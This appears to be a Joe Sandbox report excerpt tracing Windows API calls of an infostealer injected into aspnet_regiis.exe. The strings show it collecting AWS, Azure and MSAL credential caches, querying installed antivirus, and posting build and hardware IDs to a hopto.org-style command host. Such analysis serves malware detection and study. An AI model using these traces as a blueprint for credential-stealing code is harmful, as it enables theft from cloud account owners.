                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                            • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                            • API String ID: 3006978581-858375883
                                                                                                                            • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                            • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                            • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                            • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                            • wsprintfW.USER32 ref: 004016BC
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                            • _time64.MSVCRT ref: 0040170E
                                                                                                                            • srand.MSVCRT ref: 00401715
                                                                                                                            • rand.MSVCRT ref: 0040171E
                                                                                                                            • _memset.LIBCMT ref: 0040172E
                                                                                                                            • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                            • _memset.LIBCMT ref: 00401763
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                            • _memset.LIBCMT ref: 004017BE
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                            • String ID: %s%s$delays.tmp
                                                                                                                            • API String ID: 1620473967-1413376734
                                                                                                                            • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                            • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                            • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                            • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004164E2
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                              • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                              • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                            • _memset.LIBCMT ref: 00416556
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                              • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                              • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                              • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                              • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                            • _memset.LIBCMT ref: 004165CA
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                            • _memset.LIBCMT ref: 0041663E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                            • API String ID: 780282842-974132213
                                                                                                                            • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                            • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                            • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                            • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                            • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                            • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1956182324-0
                                                                                                                            • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                            • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                            • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                            • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                              • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                              • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                              • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                              • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                              • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                              • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                              • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                              • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                              • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                              • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                              • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                              • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                              • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                              • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                              • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                              • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                              • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                            • String ID: .exe$.exe$433cd71b7a2bdd3668a493b00ee95630$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                            • API String ID: 305159127-3898869892
                                                                                                                            • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                            • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                            • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                            • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                            APIs
                                                                                                                            • strtok_s.MSVCRT ref: 004135EA
                                                                                                                            • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                            • strtok_s.MSVCRT ref: 0041398F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                            • String ID: false$true
                                                                                                                            • API String ID: 2116072422-2658103896
                                                                                                                            • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                            • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                            • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                            • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                            • String ID: GET$\xA
                                                                                                                            • API String ID: 442264750-571280152
                                                                                                                            • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                            • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                            • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                            • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                              • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                              • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                            • API String ID: 4288110179-315474579
                                                                                                                            • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                            • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                            • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                            • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004012A7
                                                                                                                            • _memset.LIBCMT ref: 004012B6
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                            • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                            • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                              • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
